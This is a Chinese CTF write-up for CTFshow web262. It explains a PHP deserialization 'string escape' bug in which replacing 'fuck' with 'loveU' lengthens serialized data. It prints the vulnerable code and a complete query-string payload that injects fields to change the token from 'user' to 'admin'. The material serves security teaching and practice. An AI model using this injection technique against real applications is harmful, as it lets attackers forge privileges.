CTFshow 反序列化入门 web262
考点是:字符串逃逸
出现$umsg = str_replace('fuck', 'loveU', serialize($msg));
,替换字符后是增长,增长逃逸
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-12-03 02:37:19
# @Last Modified by: h1xa
# @Last Modified time: 2020-12-03 16:05:38
# @message.php
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
class message{
public $from;
public $msg;
public $to;
public $token='user';
public function __construct($f,$m,$t){
$this->from = $f;
$this->msg = $m;
$this->to = $t;
}
}
$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];
if(isset($f) && isset($m) && isset($t)){
$msg = new message($f,$m,$t);
$umsg = str_replace('fuck', 'loveU', serialize($msg));
setcookie('msg',base64_encode($umsg));
echo 'Your message has been sent';
}
highlight_file(__FILE__);
复制到本地调试,echo输出,test是自己输入的字符,发现token是user,应该是要修改user为admin
O:7:"message":4:{s:4:"from";s:4:"test";s:3:"msg";s:4:"test";s:2:"to";s:4:"test";s:5:"token";s:4:"user";}
需要构建的代码 ";s:2:"to";s:4:"test";s:5:"token";s:5:"admin";}
长度为 47
所以需要输入47个fuck
+";s:2:"to";s:4:"test";s:5:"token";s:5:"admin";}
(长度为235)
然后经过str_replace('fuck', 'loveU', serialize($msg);
后,fuck
替换为loveU
,前面fuck
的长度就变成了235,而多出来的";s:2:"to";s:4:"test";s:5:"token";s:5:"admin";}
就会被顶到后面作为序列化对象执行
# 最后的 ";s:2:"to";s:4:"test";s:5:"token";s:4:"user";} 会被 ";s:2:"to";s:4:"test";s:5:"token";s:5:"admin";} 顶掉
O:7:"message":4:{s:4:"from";s:4:"test";s:3:"msg";s:235:"loveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveU";s:2:"to";s:4:"test";s:5:"token";s:5:"admin";}";s:2:"to";s:4:"test";s:5:"token";s:4:"user";}
构建url
f=test&m=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:2:"to";s:4:"test";s:5:"token";s:5:"admin";}&t=test
在浏览器输入后显示Your message has been sent
,发现没有flag回显,但是在头部的注释里面发现有一个message.php
,访问发现flag
就在下面